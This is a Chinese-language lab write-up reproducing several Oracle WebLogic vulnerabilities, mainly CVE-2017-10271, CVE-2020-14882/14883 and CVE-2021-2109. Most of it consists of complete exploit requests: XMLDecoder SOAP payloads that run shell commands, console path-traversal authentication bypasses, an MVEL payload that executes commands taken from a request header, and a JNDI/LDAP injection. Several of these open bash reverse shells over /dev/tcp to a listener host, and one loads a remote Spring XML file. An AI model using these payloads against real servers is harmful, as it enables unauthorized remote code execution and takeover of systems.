0x01.CVE-2016-0638 Weblogic反序列化命令执行

0x02.CVE-2017-10271 Weblogic XMLDecoder反序列化命令执行

简单复现一下,本地搭了个docker

1. poc如下

  1. POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
  2. Host: 192.168.26.147:7001
  3. Accept-Encoding: gzip, deflate
  4. Accept: */*
  5. Accept-Language: en
  6. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  7. Connection: close
  8. Content-Type: text/xml
  9. Content-Length: 987
  11. <?xml version="1.0"?>
  12. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  13.     <soapenv:Header>
  14.         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  15.             <java version="1.8.0_131" class="java.beans.XMLDecoder">
  16.                 <void class="java.lang.ProcessBuilder">
  17.                     <array class="java.lang.String" length="3">
  18.                         <void index="0">
  19.                             <string>/bin/bash</string>
  20.                         </void>
  21.                         <void index="1">
  22.                             <string>-c</string>
  23.                         </void>
  24.                         <void index="2">
  25.                             <string>id</string>
  26.                         </void>
  27.                     </array>
  28.                     <void method="start" />
  29.                 </void>
  30.             </java>
  31.         </work:WorkContext>
  32.     </soapenv:Header>
  33.     <soapenv:Body />
  34. </soapenv:Envelope>

主要可以看到这个漏洞执行的调用栈(长的离谱,这些挖洞的怎么挖到的,逐渐离谱….)
image.png

关于原理

注:半蒙半猜吧,跟php的反序列化似乎又不太一样
调用链说起来比较复杂,也不甚明了,直接看关于XML的反序列化的漏洞
readobject()这个方法会解析xml代码中的内容,xml文件本身保存的就是将java对象中的XML序列化成的一个静态文件
当readobject()这个方法读取这个文件时,会触发反序列化,也就是将静态代码块重新解析为可执行的java代码,此时如果包含恶意操作
比如将执行反弹shell命令的操作进行XML序列化后,XMLDecoder去解析的时候执行反序列化,也就是运行我们想要执行的恶意代码。

本地ceshi.java

  1. import java.beans.XMLDecoder;
  2. import java.io.*;
  4. public class ceshi {
  6.     public static void main(String[] args) throws FileNotFoundException {
  7.         System.out.println("aaa");
  8.         String filename = "/root/IdeaProjects/untitled1/src/test.xml";
  9.         XMLDecoder XD =new XMLDecoder(new FileInputStream(filename));
  10.         Object o = XD.readObject();
  11.         System.out.println(o);
  12.     }
  13. }

test.xml

  1. <?xml version="1.0"?>
  2. <java version="1.8.0_131" class="java.beans.XMLDecoder">
  3.     <void class="java.lang.ProcessBuilder">
  4.         <array class="java.lang.String" length="3">
  5.             <void index="0">
  6.                 <string>/bin/bash</string>
  7.             </void>
  8.             <void index="1">
  9.                 <string>-c</string>
  10.             </void>
  11.             <void index="2">
  12.                 <string>curl 127.0.0.1:8099</string>
  13.             </void>
  14.         </array>
  15.         <void method="start" />
  16.     </void>
  17. </java>

kali下没啥好启动的,干脆起个curl好了,本地再对端口做一些监听
执行一下java代码,中间报了一个错,说索引超出界限了,这个暂时不管他,报错依旧可以正常执行命令,如下图,成功执行了curl命令
image.png
关于这个漏洞比较核心的成因,就在于XMLDecoder反序列化没有做任何安全检查,导致命令执行。

参考大佬们的分析:

https://paper.seebug.org/916/ XMLDecoder解析流程分析
https://blog.csdn.net/sojrs_sec/article/details/103367511 Weblogic CVE-2017-10271 反序列化详细调试
https://paper.seebug.org/487/ Weblogic XMLDecoder RCE分析
https://blog.51cto.com/skytina/2055335 WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

2. exp如下

直接进行反弹shell的操作,公网主机监听8000口(这里以kali为例,监听8000口)

  1. POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
  2. Host: 192.168.26.147:7001
  3. Accept-Encoding: gzip, deflate
  4. Accept: */*
  5. Accept-Language: en
  6. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  7. Connection: close
  8. Content-Type: text/xml
  9. Content-Length: 639
  11. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
  12. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  13. <java version="1.4.0" class="java.beans.XMLDecoder">
  14. <void class="java.lang.ProcessBuilder">
  15. <array class="java.lang.String" length="3">
  16. <void index="0">
  17. <string>/bin/bash</string>
  18. </void>
  19. <void index="1">
  20. <string>-c</string>
  21. </void>
  22. <void index="2">
  23. <string>bash -i &gt;&amp; /dev/tcp/192.168.26.146/8000 0&gt;&amp;1</string>
  24. </void>
  25. </array>
  26. <void method="start"/></void>
  27. </java>
  28. </work:WorkContext>
  29. </soapenv:Header>
  30. <soapenv:Body/>
  31. </soapenv:Envelope>

查看回弹的shell
image.png

0x03.CVE-2019-2725 Weblogic XMLDecoder反序列化

0x04.CVE-2019-2729 Weblogic 反序列化远程代码执行

0x05.CVE-2020-2551 Weblogic IIOP反序列化漏洞

0x06.CVE-2020-2555 Weblogic 反序列化漏洞

0x07.CVE-2020-14750 Weblogic Console 后台登录绕过漏洞

/console/images/%252e%252e/console.portal?_nfpb=true&DispatcherPortletperspective=configuration-page&_pageLabel=&handle=test

0x08.CVE-2020-14882&14883weblogic未授权命令执行漏洞

复现版本: WebLogic Server 版本: 12.2.1.3.0

1. cve-2020-14882 登录绕过poc

  1. /console/css/%252e%252e%252fconsole.portal

image.png

2. cve-2020-14883 未授权rce

1)Weblogic 12.2.1以上版本

  1. /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

image.png
查看服务器
image.png

GET方式

通过get的方式构造反射,获取请求头的输入,包含漏洞主机执行代码后,获取回显,进行漏洞利用

  1. GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window")?new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1
  2. Host: 192.168.64.135:7001
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. cmd:ls -la
  9. Cookie: ADMINCONSOLESESSION=80df-PIfHsjyIOy9wn4vYU-gTRCDA_Y04nPNexR553_6Ivoww0xr!1975875885
  10. Upgrade-Insecure-Requests: 1
  11. Cache-Control: max-age=0

image.png

同理Post方式

  1. POST /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal HTTP/1.1
  2. Host: 192.168.64.135:7001
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. cmd:id
  9. Cookie: ADMINCONSOLESESSION=80df-PIfHsjyIOy9wn4vYU-gTRCDA_Y04nPNexR553_6Ivoww0xr!1975875885
  10. Upgrade-Insecure-Requests: 1
  11. Cache-Control: max-age=0
  12. Content-Type: application/x-www-form-urlencoded
  13. Content-Length: 1238
  15. _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
  16. weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
  17. java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
  18. field.setAccessible(true);
  19. Object obj = field.get(adapter);
  20. weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
  21. String cmd = req.getHeader("cmd");
  22. String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
  23. if (cmd != null) {
  24. String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
  25. weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
  26. res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
  27. res.getServletOutputStream().flush();
  28. res.getWriter().write("");
  29. }executeThread.interrupt();
  30. ");

image.png

反弹shell

  1. cmdbash -i >& /dev/tcp/192.168.64.128/7788 0>&1

image.png

2)Weblogic 通用版本

通用反弹方式为,写入一个xml文件,再通过类似于远程加载恶意代码的方式获取shell

  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <beans xmlns="http://www.springframework.org/schema/beans"
  3.    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4.    xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  5.     <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  6.         <constructor-arg>
  7.           <list>
  8.             <value>bash</value>
  9.             <value>-c</value>
  10.             <value><![CDATA[bash -i >& /dev/tcp/192.168.64.128/7788 0>&1]]></value>
  11.           </list>
  12.         </constructor-arg>
  13.     </bean>
  14. </beans>

image.png

本地起一个http服务

  1. python -m SimpleHTTPServer 8080

image.png

再监听7788端口

  1. nc -lvvp 7788

以上为监听端(实际环境为vps端)

完成后,加载攻击payload,一般为攻击机

  1. /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.64.128:8080/rce.xml")

image.png
查看监听端,成功回弹shell,权限为oracle
image.png

3.EXP

cve-2020-14882&14883.txt

0X09.CVE-2021-2109 JNDI注入导致RCE【授权RCE】

影响版本
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
使用使用vulhub中CVE-2020-14882漏洞,作为复现环境,正好是Weblogic Server 12.2.1.3.0版本
image.png

1)起一个LDAP服务

  1. java -jar JNDIExploit-v1.11.jar -i 47.111.15.14

image.png

2)exp【此处若不存在未授权漏洞,则需要使用一个有效的Cookie】

  1. POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1
  2. Host: 47.111.15.14:7001
  3. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. DNT: 1
  8. Connection: close
  9. Cookie: ADMINCONSOLESESSION=Lco4Z-OYpYItcG8mftL5nwY242CQq5pFWG9kc3cztJiwbIn3aV-Y!1788572832
  10. Upgrade-Insecure-Requests: 1
  11. Sec-GPC: 1
  12. cmd:pwd
  13. X-Forwarded-For: 127.0.0.1
  14. Content-Type: application/x-www-form-urlencoded
  15. Content-Length: 174
  17. _pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://47.111.15;14:1389/Basic/WeblogicEcho;AdminServer%22)

使用burpsuite发包,JNDIExploit进行监听
image.png
执行代码如下
image.png
执行代码在cmd处
image.png
反弹shell
**bash -i >& /dev/tcp/47.111.15.14/888 0>&1**
image.png
nc进行监听
**nc -lvvp 888**
image.png
未能反弹shell,原因未知

验证工具

weblogic通杀.jar.zip